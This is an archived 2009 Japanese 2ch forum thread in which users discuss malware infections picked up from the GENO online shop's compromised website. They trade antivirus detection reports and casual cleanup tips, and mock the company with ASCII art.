_,,..r'''""~~`''ー-.、 ,,.r,:-‐'''"""~~`ヽ、:;:;:\ r"r ゝ、:;:ヽ r‐-、 ,...,, |;;;;| ,,.-‐-:、 ヾ;:;ゝ :i! i! |: : i! ヾ| r'"~~` :;: ::;",,-‐‐- `r'^! ! i!. | ;| l| ''"~~ 、 i' | i! ヽ | | | ,.:'" 、ヽ、 !,ノ ゝ `-! :| i! .:;: '~~ー~~'" ゙ヾ : : ::| r'"~`ヾ、 i! i! ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、GENOの社員見てるー? ,.ゝ、 r'""`ヽ、i! `:、 ー - '" :: : :/ ,/ はよ職安いけよーwwwwwww !、 `ヽ、ー、 ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'" | \ i:" ) | ~`'''ー---―''"~ ヽ `'" ノ
939 :
アグロステンマ アゲラタム(アラバマ州) :2009/04/07(火) 10:41:59.24 ID:F3zLYXU/
C:\Documents and Settings\ユーザ\Local Settings\Temp\ Rnu6d2Pn.zip とりあえずこんな名前のzipがDropper.efで引っかかった とにかく感染してたらZIP作るってこと?
avastでも シールドが「標準」だと感染確認 「高」か、適切に設定した「カスタム」でマルウェア拒否 avastで安心してるやつは気を付けろ
941 :
カタクリ(北海道) :2009/04/07(火) 10:44:50.85 ID:7MUmuId/
2ちゃんで宣伝なんかしてるから目つけられるんだよ
942 :
オウレン(大阪府) :2009/04/07(火) 10:44:56.43 ID:KkHktETZ
おまえら短縮ウイルスをzipスレに貼ったりしたのか? あんなの本物と混ぜられたら防御不可能だろ。鬼過ぎるぞ。
嘘を嘘と〜のコピペ貼れよ
945 :
モクレン(石川県) :2009/04/07(火) 10:46:32.22 ID:jLm5dvjo
>>942 そんなもん引っかかるやつが悪いだろ
zip(笑)
まだGENOにアクセスすると感染するんか?
みてらんねーわw GENOの鯖ってどこにあるの? 近所なら手伝ってやるよ
949 :
オウレン(大阪府) :2009/04/07(火) 10:48:47.29 ID:KkHktETZ
>>945 ひっかかるだろw
このスレの存在を知っててもこのスレを開いて読まないと
短縮ウイルスの貼られ方とかわからない。このスレスルー
してたけど日曜の深夜に読んでみてぞっとしたよ。
普段zipスレいたけど日曜の午後にいなくてよかったと心底
ほっとした。
>>946 トップからリンク踏んで中入ってくと感染する
SEOワロタ
952 :
カンパニュラ・サキシフラガ(大阪府) :2009/04/07(火) 10:49:40.54 ID:xLJJRuyw
誰か今回の内容を、後世に残るような名AAにしてくれ
953 :
オウレン(大阪府) :2009/04/07(火) 10:50:14.26 ID:KkHktETZ
>>947 さっきのとは違って今回はまじな感想だよ。
過去スレ読んでzipスレに混ぜてるレスとか
読んだけど本当に鬼だなって思ってな。
zipスレなんて混ぜられたら絶対に気付かないもん。
こんなセキュリティ体制ゆるゆるのいい加減なショップで買い物するやつもういないだろ
955 :
パンジー(コネチカット州) :2009/04/07(火) 10:53:45.82 ID:7bgVIM1W
>>954 ゆるかわセキュリティー
これから流行るな、うん
zipスレなんぞウイルス貼られても大丈夫だろw あいつらどんだけのURLを掻い潜ってきたと思ってるんだ 基本的に仮想使ってるだろjk
小悪魔セキュリティとかもありだな
怖くてgeno見てないんだが、唯のお詫びしか載せてないの? どんな問題があって何処を改修したのかとか、ユーザはその後どう対処すれば良いか記載するのが運営者の責務だと思うんだけどねえ
,、 _ / l ヽヽ ,′| ヘ ヽ l l l ヘ | l l. l | ヘ l | ヘ ヽ / j ヽ \ , -┬┬、/. / \ 7 ヽ ヽ_∨ ヽ l . 二 --`ゝ /ゝ' _.. '-'´ ・ ・ ヽヽ j−'´ | = _人 ~ l 〉 <セキュリティ〜♪ / ̄ ̄l ノ´ / ̄ ̄~| _.. ィ‐┐ ゝ──'>ー<二○'´i ̄ `ー┐ l _」 つ ゝ───…  ̄ / ⌒ヽ/
小悪魔age派
┏━━━━━━━━━━━━━━━━ ┃ >サーバーに一部不具合がございました ┃ 分かったかボケなす ┃ 人 ┃ <。 .> ┃ ∧_∧. /Vミ バシ!! ┗━━(´・∀・`)/ ミ━━━━━━━━━ /) y )つ |~ ̄] ̄ ̄ ̄ ̄ ̄ ̄|
963 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 10:58:26.70 ID:izpoIvzz
なぜ頑なに無言を決め込むんだ
そもそもここは 新品と表記しといて中古で送るようなとこでしょ
965 :
モリシマアカシア(東京都) :2009/04/07(火) 10:59:28.21 ID:fhtlRrYZ
再起動かけたけど無問題なおれセーフ?
966 :
オウレン(大阪府) :2009/04/07(火) 10:59:40.66 ID:KkHktETZ
>>956 仮想でやってるのか。
おまえらまじですごいな
ショップ情報が価格comから消滅したな
>>965 今回のウイルスはステルスタイプだから
むしろ再起動かけたらまずい
>>852 が探偵ファイルで取り上げられたな
誰かこっちも調査依頼してこいよ
>>965 いい機会だし諸々のパスワード変更しておいた方がいいな
971 :
モリシマアカシア(大阪府) :2009/04/07(火) 11:00:22.86 ID:jaXLtBhk
これって何処の消費者センターに相談すれば良いんだ? 地元の都道府県でおk?GENOの本社が有る所が良いのか??
973 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 11:00:58.97 ID:izpoIvzz
短縮サイト全部NGするからいちらんくれよ
なんでげのはお詫びもろくにせず平気な顔してんの?リカバリ大変だったんですけど。 ずっとほっといた責任あるんだから賠償しろよ!
975 :
ヒヤシンス(福岡県) :2009/04/07(火) 11:02:12.41 ID:pnDf58uK
>>965 多分セーフじゃないの?
>>802 にカスペで検知できるって書いてあったからオンラインスキャンしてみろよ
>>974 GENO「この機会に、少々高めですが弊社のDSP版Vistaをお買い求めください!」
GENOはウイルスもったままWEB販売現在もやってるの? 在庫減っているんだろうか?
978 :
モリシマアカシア(東京都) :2009/04/07(火) 11:03:21.09 ID:fhtlRrYZ
>>975 おkkk
前スレに再起動かからないとか書いてあったよね
廃品回収業者ですよ
xp、ZoneAlarm Antivirus使いで感染した人いる? タスクマネージャーのプロセスも正常だし、カスペのオンラインスキャンも share.exeしか検知しなかった。
981 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 11:05:20.01 ID:izpoIvzz
>>978 マジレスするとバックドア+ボットなんだから再起動とか関係ねえよ
982 :
ポピー(アラバマ州) :2009/04/07(火) 11:05:39.41 ID:/PdA7gPs
>>944 俺そこに面接に行ったけど
マンションの一室でやってる感じ
セキュリティー対策は甘そうな感じだったな
983 :
トキワヒメハギミツバアケビ(愛知県) :2009/04/07(火) 11:06:50.67 ID:QpUgyCdr
984 :
ポピー(アラバマ州) :2009/04/07(火) 11:08:05.53 ID:/PdA7gPs
今頃責任の投げ合いやってるんだろうねぇ
987 :
アメリカフウロ(大阪府) :2009/04/07(火) 11:08:49.47 ID:O0HiMAvz
今日謝罪するか否かでこの会社の命運が分かれるな
988 :
ヒヤシンス(福岡県) :2009/04/07(火) 11:09:14.06 ID:pnDf58uK
989 :
モクレン(石川県) :2009/04/07(火) 11:09:20.07 ID:jLm5dvjo
>>954 中小の通販サイトなんてこんなところが多いだろうよ。
セキュリティーの知識なんてないし対策もほとんどしていない。
991 :
ヒメオドリコソウ(コネチカット州) :2009/04/07(火) 11:09:53.54 ID:IXgeH8s2
まだだ・・・まだ終わらんぞぉ
992 :
アメリカフウロ(大阪府) :2009/04/07(火) 11:10:37.40 ID:O0HiMAvz
次スレよろ
感染したとかしないとか心配ならPC使うな 次スレいるのか
994 :
クロッカス(東日本) :2009/04/07(火) 11:11:17.49 ID:v2pFr5JY
マジで悩んでるやつへ Avast!を導入、ウェブシールド(localhost:12080)を設定するとこのスレとおさらば。
995 :
セイヨウオダマキ(catv?) :2009/04/07(火) 11:11:18.04 ID:6F1yzox8
昨日踏んだけど何ともなかったぞ
1000なら倒産
1000ならウィルス付きPC大特化セール開催
1000ならみのりん
999 :
ナノハナ(アラバマ州) :2009/04/07(火) 11:12:26.50 ID:p3oa4epO
999
1000 :
トキワヒメハギミツバアケビ(愛知県) :2009/04/07(火) 11:12:30.40 ID:QpUgyCdr
1001 :
1001 :
Over 1000 Thread